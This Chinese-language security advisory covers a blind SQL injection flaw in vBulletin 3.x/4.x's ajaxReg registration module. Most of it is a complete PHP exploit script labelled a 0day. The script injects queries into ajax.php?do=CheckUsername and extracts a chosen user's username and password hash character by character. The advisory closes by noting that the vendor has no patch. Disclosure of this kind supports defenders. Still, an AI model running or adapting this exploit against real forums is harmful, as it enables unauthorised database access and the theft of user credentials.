VBulletin 3.x/4.x ajaxReg模块SQL盲注漏洞

发布日期:2012-12-08
更新日期:2012-12-12

受影响系统:
VBulletin VBulletin
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56877

vBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。ajaxReg是ajax式的注册模块,支持即时字段检查。

vBulletin的ajaxReg模块在实现上存在SQL注入漏洞,成功利用后可允许攻击者未授权访问数据库。

<*来源:Cold z3ro
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/php
<?

# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js

function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.example.com | www.example.com".
        "\n[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
        "\n[+] Ex.  : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
        "\n[+] Note. : Its a 0day exploit\n\n";
    exit ();
}

function check ($hostname, $path, $field, $pos, $usid, $char)
{
    $char = ord ($char);
    $inj = 'ajax.php?do=CheckUsername&param=';
  $inj.=
"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
  $culr = $hostname.$path.$inj;
  $curl = curl_init();
  curl_setopt ($curl, CURLOPT_URL, $culr );
  curl_setopt($curl, CURLOPT_HEADER, 1);
  curl_setopt($curl, CURLOPT_VERBOSE, 0);
    ob_start();
    curl_exec ($curl);
    curl_close ($curl);
    $con = ob_get_contents();
    ob_end_clean();
  if(eregi('Invalid',$con))
      return true;
    else
        return false;
}


function brutechar ($hostname, $path, $field, $usid, $key)
{
    $pos = 1;
    $chr = 0;
    while ($chr < strlen ($key))
    {
        if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
        {
            echo $key [$chr];
            $chr = -1;
            $pos++;
        }
        $chr++;
    }
}


if (count ($argv) != 4)
    usage ();

$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me

?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vbulletin.com/

相关推荐